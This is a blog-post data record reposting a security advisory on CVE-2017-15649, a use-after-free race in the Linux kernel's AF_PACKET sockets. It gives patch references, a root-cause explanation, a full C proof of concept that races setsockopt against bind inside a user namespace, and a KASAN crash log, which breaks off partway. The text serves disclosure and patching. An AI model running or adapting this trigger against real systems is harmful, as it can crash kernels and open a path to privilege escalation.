{"id":10624,"date":"2017-11-27T14:19:16","date_gmt":"2017-11-27T22:19:16","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/11\/27\/news-4396\/"},"modified":"2017-11-27T14:19:16","modified_gmt":"2017-11-27T22:19:16","slug":"news-4396","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2017\/11\/27\/news-4396\/","title":{"rendered":"SSD Advisory \u2013 Linux Kernel AF_PACKET Use-After-Free Vulnerability"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz | Date: Mon, 27 Nov 2017 08:12:04 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<div 
class=\"pf-content\">\n<p><strong>Vulnerability Summary<\/strong><\/p>\n<p>The following advisory describes a use-after-free (UAF) vulnerability in AF_PACKET in the Linux kernel. Successful exploitation of this vulnerability may lead to privilege escalation.<\/p>\n<p>AF_PACKET sockets \u201callow users to send or receive packets at the device driver level\u201d. For example, a user can implement their own protocol on top of the physical layer, or sniff packets that include Ethernet or higher-level protocol headers.<\/p>\n<p><strong>Credit<\/strong><\/p>\n<p>An independent security researcher discovered this vulnerability and reported it to Beyond Security's SSD.<\/p>\n<p><strong>Vendor Response<\/strong><\/p>\n<p>Update 1<\/p>\n<p>CVE: CVE-2017-15649<\/p>\n<p>\u201cIt is quite likely that this vulnerability has already been fixed by:<\/p>\n<p>packet: hold bind lock when rebinding to fanout hook &#8211; http:\/\/patchwork.ozlabs.org\/patch\/813945\/<\/p>\n<p>Related to this, but not yet merged, is<\/p>\n<p>packet: in packet_do_bind, test fanout with bind_lock held &#8211; http:\/\/patchwork.ozlabs.org\/patch\/818726\/<\/p>\n<p>We verified that the vulnerability does not trigger on v4.14-rc2, but the test succeeded on the first commit (008ba2a13f2d).\u201d<\/p>\n<p><span 
id=\"more-3543\"><\/span><\/p>\n<p><strong>Vulnerability Details<\/strong><\/p>\n<p>This use-after-free is caused by a race condition between fanout_add() (reached from setsockopt) and the AF_PACKET socket.<\/p>\n<p>Even though a packet_fanout has already been created from fanout_add(), the race causes __unregister_prot_hook() from packet_do_bind() to set po-&gt;running to 0.<\/p>\n<p>This allows us to bypass the check in unregister_prot_hook() from packet_release(), so that the packet_fanout is freed while it can still be referenced from the packet_type linked list.<\/p>\n<p><strong>Proof of Concept<\/strong><\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a1c8f6415a75473642493\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button 
crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">\/\/ Please note, to have KASAN report the UAF, you need to enable it when compiling the kernel.\n\/\/ the kernel config is provided too.\n\n#define _GNU_SOURCE\n\n#include &lt;stdio.h&gt;\n#include &lt;stdlib.h&gt;\n#include &lt;string.h&gt;\n#include &lt;unistd.h&gt;\n#include &lt;sys\/types.h&gt;\n#include &lt;sys\/socket.h&gt;\n#include &lt;sys\/ioctl.h&gt;\n#include &lt;net\/if.h&gt;\n#include &lt;pthread.h&gt;\n#include &lt;sys\/utsname.h&gt;\n#include &lt;sched.h&gt;\n#include &lt;stdarg.h&gt;\n#include &lt;stdbool.h&gt;\n#include &lt;sys\/stat.h&gt;\n#include &lt;fcntl.h&gt;\n\n#define IS_ERR(c, s) { if (c) perror(s); }\n\nstruct sockaddr_ll {\n\tunsigned short\tsll_family;\n\tshort\t\tsll_protocol; \/\/ big endian\n\tint\t\tsll_ifindex;\n\tunsigned short\tsll_hatype;\n\tunsigned char\tsll_pkttype;\n\tunsigned char\tsll_halen;\n\tunsigned char\tsll_addr[8];\n};\n\nstatic int fd;\nstatic struct ifreq ifr;\nstatic struct sockaddr_ll addr;\n\nvoid *task1(void *unused)\n{\n\tint fanout_val = 0x3;\n\n\t\/\/ need race: check on po-&gt;running\n\t\/\/ also must be 1st or link wont register\n\t\/\/ 0x107 is SOL_PACKET, 18 is PACKET_FANOUT\n\tint err = setsockopt(fd, 0x107, 18, &amp;fanout_val, sizeof(fanout_val));\n\t\/\/ IS_ERR(err == -1, &quot;setsockopt&quot;);\n\treturn NULL;\n}\n\nvoid *task2(void *unused)\n{\n\tint err = bind(fd, (struct sockaddr *)&amp;addr, sizeof(addr));\n\t\/\/ IS_ERR(err == -1, &quot;bind&quot;);\n\treturn NULL;\n}\n\nvoid loop_race()\n{\n\tint err, index;\n\n\twhile(1) {\n\t\tfd = socket(AF_PACKET, SOCK_RAW, PF_PACKET);\n\t\tIS_ERR(fd == -1, &quot;socket&quot;);\n\n\t\tstrcpy((char *)&amp;ifr.ifr_name, &quot;lo&quot;);\n\t\terr = ioctl(fd, SIOCGIFINDEX, &amp;ifr);\n\t\tIS_ERR(err == -1, &quot;ioctl SIOCGIFINDEX&quot;);\n\t\tindex = ifr.ifr_ifindex;\n\n\t\terr = ioctl(fd, SIOCGIFFLAGS, &amp;ifr);\n\t\tIS_ERR(err == -1, &quot;ioctl SIOCGIFFLAGS&quot;);\n\n\t\tifr.ifr_flags &amp;= ~(short)IFF_UP;\n\t\terr = ioctl(fd, SIOCSIFFLAGS, &amp;ifr);\n\t\tIS_ERR(err == -1, &quot;ioctl SIOCSIFFLAGS&quot;);\n\n\t\taddr.sll_family = AF_PACKET;\n\t\taddr.sll_protocol = 0x0; \/\/ need something different to rehook &amp;&amp; 0 to skip register_prot_hook\n\t\taddr.sll_ifindex = index;\n\n\t\tpthread_t thread1, thread2;\n\t\tpthread_create(&amp;thread1, NULL, task1, NULL);\n\t\tpthread_create(&amp;thread2, NULL, task2, NULL);\n\n\t\tpthread_join(thread1, NULL);\n\t\tpthread_join(thread2, NULL);\n\n\t\t\/\/ UAF\n\t\tclose(fd);\n\t}\n}\n\nstatic bool write_file(const char* file, const char* what, ...) {\n\tchar buf[1024];\n\tva_list args;\n\tva_start(args, what);\n\tvsnprintf(buf, sizeof(buf), what, args);\n\tva_end(args);\n\tbuf[sizeof(buf) - 1] = 0;\n\tint len = strlen(buf);\n\n\tint fd = open(file, O_WRONLY | O_CLOEXEC);\n\tif (fd == -1)\n\t\treturn false;\n\tif (write(fd, buf, len) != len) {\n\t\tclose(fd);\n\t\treturn false;\n\t}\n\tclose(fd);\n\treturn true;\n}\n\nvoid setup_sandbox() {\n\tint real_uid = getuid();\n\tint real_gid = getgid();\n\n\tif (unshare(CLONE_NEWUSER) != 0) {\n\t\tprintf(&quot;[!] unprivileged user namespaces are not available\\n&quot;);\n\t\tperror(&quot;[-] unshare(CLONE_NEWUSER)&quot;);\n\t\texit(EXIT_FAILURE);\n\t}\n\tif (unshare(CLONE_NEWNET) != 0) {\n\t\tperror(&quot;[-] unshare(CLONE_NEWNET)&quot;);\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tif (!write_file(&quot;\/proc\/self\/setgroups&quot;, &quot;deny&quot;)) {\n\t\tperror(&quot;[-] write_file(\/proc\/self\/setgroups)&quot;);\n\t\texit(EXIT_FAILURE);\n\t}\n\tif (!write_file(&quot;\/proc\/self\/uid_map&quot;, &quot;0 %d 1\\n&quot;, real_uid)) {\n\t\tperror(&quot;[-] write_file(\/proc\/self\/uid_map)&quot;);\n\t\texit(EXIT_FAILURE);\n\t}\n\tif (!write_file(&quot;\/proc\/self\/gid_map&quot;, &quot;0 %d 1\\n&quot;, real_gid)) {\n\t\tperror(&quot;[-] write_file(\/proc\/self\/gid_map)&quot;);\n\t\texit(EXIT_FAILURE);\n\t}\n}\n\nint main(int argc, char *argv[])\n{\n\tsetup_sandbox();\n\tsystem(&quot;id; capsh --print&quot;);\n\tloop_race();\n\treturn 0;\n}<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0111 seconds] -->  <\/p>\n<p><strong>Crash Log<\/strong><\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a1c8f6415a7f994363130\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div 
class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">[   73.703931] dev_remove_pack: ffff880067cee280 not found\n[   73.717350] ==================================================================\n[   73.726151] BUG: KASAN: use-after-free in dev_add_pack+0x1b1\/0x1f0\n[   73.729371] Write of size 8 at addr ffff880067d28870 by task poc\/1175\n[   73.732594]\n[   73.733605] CPU: 3 PID: 1175 Comm: poc Not tainted 4.14.0-rc1+ #29\n[   73.737714] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.1-1ubuntu1 04\/01\/2014\n[   73.746433] Call Trace:\n[   73.747985]  dump_stack+0x6c\/0x9c\n[   73.749410]  ? dev_add_pack+0x1b1\/0x1f0\n[   73.751622]  print_address_description+0x73\/0x290\n[   73.753646]  ? dev_add_pack+0x1b1\/0x1f0\n[   73.757343]  kasan_report+0x22b\/0x340\n[   73.758839]  __asan_report_store8_noabort+0x17\/0x20\n[   73.760617]  dev_add_pack+0x1b1\/0x1f0\n[   73.761994]  register_prot_hook.part.52+0x90\/0xa0\n[   73.763675]  packet_create+0x5e3\/0x8c0\n[   73.765072]  __sock_create+0x1d0\/0x440\n[   73.766030]  SyS_socket+0xef\/0x1b0\n[   73.766891]  ? move_addr_to_kernel+0x60\/0x60\n[   73.769137]  ? exit_to_usermode_loop+0x118\/0x150\n[   73.771668]  entry_SYSCALL_64_fastpath+0x13\/0x94\n[   73.773754] RIP: 0033:0x44d8a7\n[   73.775130] RSP: 002b:00007ffc4e642818 EFLAGS: 00000217 ORIG_RAX: 0000000000000029\n[   73.780503] RAX: ffffffffffffffda RBX: 00000000004002f8 RCX: 000000000044d8a7\n[   73.785654] RDX: 0000000000000011 RSI: 0000000000000003 RDI: 0000000000000011\n[   73.790358] RBP: 00007ffc4e642840 R08: 00000000000000ca R09: 00007f4192e6e9d0\n[   73.793544] R10: 0000000000000000 R11: 0000000000000217 R12: 000000000040b410\n[   73.795999] R13: 000000000040b4a0 R14: 0000000000000000 R15: 0000000000000000\n[   73.798567]\n[   73.799095] Allocated by task 1360:\n[   73.800300]  save_stack_trace+0x16\/0x20\n[   73.802533]  save_stack+0x46\/0xd0\n[   73.803959]  kasan_kmalloc+0xad\/0xe0\n[   73.805833]  kmem_cache_alloc_trace+0xd7\/0x190\n[   73.808233]  packet_setsockopt+0x1d29\/0x25c0\n[   73.810226]  SyS_setsockopt+0x158\/0x240\n[   73.811957]  entry_SYSCALL_64_fastpath+0x13\/0x94\n[   73.814636]\n[   73.815367] Freed by task 1175:\n[   73.816935]  save_stack_trace+0x16\/0x20\n[   73.821621]  save_stack+0x46\/0xd0\n[   73.825576]  kasan_slab_free+0x72\/0xc0\n[   73.827477]  kfree+0x91\/0x190\n[   73.828523]  packet_release+0x700\/0xbd0\n[   73.830162]  sock_release+0x8d\/0x1d0\n[   73.831612]  sock_close+0x16\/0x20\n[   73.832906]  __fput+0x276\/0x6d0\n[   73.834730]  ____fput+0x15\/0x20\n[   73.835998]  task_work_run+0x121\/0x190\n[   73.837564]  exit_to_usermode_loop+0x131\/0x150\n[   73.838709]  syscall_return_slowpath+0x15c\/0x1a0\n[   73.840403]  entry_SYSCALL_64_fastpath+0x92\/0x94\n[   73.842343]\n[   73.842765] The buggy address belongs to the object at ffff880067d28000\n[   73.842765]  which belongs to the cache kmalloc-4096 of size 4096\n[   73.845897] The buggy address is located 2160 bytes inside of\n[   73.845897]  4096-byte region [ffff880067d28000, ffff880067d29000)\n[   73.851443] The buggy address belongs to the page:\n[   73.852989] page:ffffea00019f4a00 count:1 mapcount:0 mapping:          (null) index:0x0 compound_mapcount: 0\n[   73.861329] flags: 0x100000000008100(slab|head)\n[   73.862992] raw: 0100000000008100 0000000000000000 0000000000000000 0000000180070007\n[   73.866052] raw: dead000000000100 dead000000000200 ffff88006cc02f00 0000000000000000\n[   73.870617] page dumped because: kasan: bad access detected\n[   73.872456]\n[   73.872851] Memory state around the buggy address:\n[   73.874057]  ffff880067d28700: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb\n[   73.876931]  ffff880067d28780: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb\n[   73.878913] &gt;ffff880067d28800: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb\n[   73.880658]                                                              ^\n[   73.884772]  ffff880067d28880: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb\n[   73.890978]  ffff880067d28900: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb\n[   73.897763] ==================================================================<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6415a7f994363130-1\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.703931<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">dev_remove_pack<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ffff880067cee280 <\/span><span class=\"crayon-st\">not<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">found<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f6415a7f994363130-2\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.717350<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span 
class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6415a7f994363130-3\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.726151<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">BUG<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">KASAN<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">use<\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-v\">after<\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-e\">free <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">dev_add_pack<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x1b1<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x1f0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f6415a7f994363130-4\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.729371<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Write <\/span><span class=\"crayon-e\">of <\/span><span class=\"crayon-i\">size<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">at 
<\/span><span class=\"crayon-e\">addr <\/span><span class=\"crayon-e\">ffff880067d28870 <\/span><span class=\"crayon-e\">by <\/span><span class=\"crayon-e\">task <\/span><span class=\"crayon-v\">poc<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">1175<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6415a7f994363130-5\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.732594<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f6415a7f994363130-6\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.733605<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">CPU<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">PID<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1175<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Comm<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">poc <\/span><span class=\"crayon-st\">Not<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">tainted<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">4.14.0<\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-v\">rc1<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-p\">#29<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6415a7f994363130-7\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.737714<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Hardware 
<\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">QEMU <\/span><span class=\"crayon-e\">Standard <\/span><span class=\"crayon-e\">PC<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">i440FX<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">PIIX<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1996<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">BIOS<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1.10.1<\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-cn\">1ubuntu1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">04<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">01<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">2014<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f6415a7f994363130-8\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.746433<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Call <\/span><span class=\"crayon-v\">Trace<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6415a7f994363130-9\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.747985<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">dump_stack<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x6c<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x9c<\/span><\/div>\n<div class=\"crayon-line 
crayon-striped-line\" id=\"crayon-5a1c8f6415a7f994363130-10\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.749410<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">dev_add_pack<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x1b1<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x1f0<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6415a7f994363130-11\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.751622<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">print_address_description<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x73<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x290<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f6415a7f994363130-12\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.753646<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">dev_add_pack<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x1b1<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x1f0<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6415a7f994363130-13\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.757343<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">kasan_report<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x22b<\/span><span 
class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x340<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f6415a7f994363130-14\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.758839<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">__asan_report_store8_noabort<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x17<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x20<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6415a7f994363130-15\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.760617<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">dev_add_pack<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x1b1<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x1f0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f6415a7f994363130-16\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.761994<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">register_prot_hook<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">part<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-cn\">52<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x90<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0xa0<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6415a7f994363130-17\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.763675<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span 
class=\"crayon-v\">packet_create<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x5e3<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x8c0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f6415a7f994363130-18\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.765072<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">__sock_create<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x1d0<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x440<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6415a7f994363130-19\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.766030<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">SyS_socket<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0xef<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x1b0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f6415a7f994363130-20\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.766891<\/span><span class=\"crayon-sy\">]<\/span><span 